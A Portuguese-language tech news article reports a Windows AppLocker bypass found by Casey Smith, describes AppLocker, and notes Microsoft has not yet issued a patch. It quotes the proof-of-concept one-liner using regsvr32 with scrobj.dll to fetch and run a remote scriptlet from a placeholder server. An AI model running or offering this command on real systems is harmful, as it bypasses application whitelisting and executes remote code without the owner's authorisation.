Conecte-se conosco
windows 10 hacker falha applocker

PCs com Windows

Falha no Windows inutiliza ferramenta de segurança do sistema

Uma vulnerabilidade recém descoberta no AppLocker do Windows permite que hackers instalem qualquer app em PCs sem deixar nenhum vestígio.

windows 10 hacker falha AppLocker

Uma falha recém descoberta no AppLocker do Windows permite que hackers instalem aplicativos maliciosos em qualquer máquina sem precisar da autorização do dono do PC. Esta falha crítica permite que qualquer pessoa com conhecimento básicos dos procedimentos de segurança consigam passar facilmente pelas barreiras de segurança do Windows sem deixar rastros.

O AppLocker é uma ferramenta que está presente desde o Windows 7Windows Server 2008 R2 que permite especificar quais usuários ou grupos podem executar determinados aplicativos na sua organização com base em identidades exclusivas dos arquivos. Se você usar o AppLocker, poderá criar regras que permitem ou negam a execução de aplicativos.

AppLocker do Windows 10

AppLocker do Windows 10

Essa falha descoberta por Casey Smith e postada em seu blog, simplesmente inutiliza este recurso, que deveria servir como dispositivo de segurança do sistema. Para explorá-la, basta utilizar o seguinte script que foi publicado em seu Github como prova de caso:

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

A Microsoft ainda não se pronunciou sobre o caso, nem anunciou nenhum patch de segurança para corrigir a falha, que também está presente no Windows 10, versão mais recente do sistema operacional, no entanto, imaginamos que a equipe da empresa está correndo contra o tempo para achar uma solução para o problema o mais rápido possível. Afinal, vários PCs com Windows estão vulneráveis neste exato momento.

Fonte: BGR

Desenvolvedor web, técnico em eletrônica, geek desde criança, nerd e gamer caixista, ama Halo e Gears of War mas está esperando a SEGA lançar outro console porque é fã de Sonic. Entusiasta de tecnologia em geral, ama robôs e PC gaming.

Comentários

Mais de PCs com Windows

Dica

Mais Lidas

Reviews

Cultura Geek

Tutoriais

To Top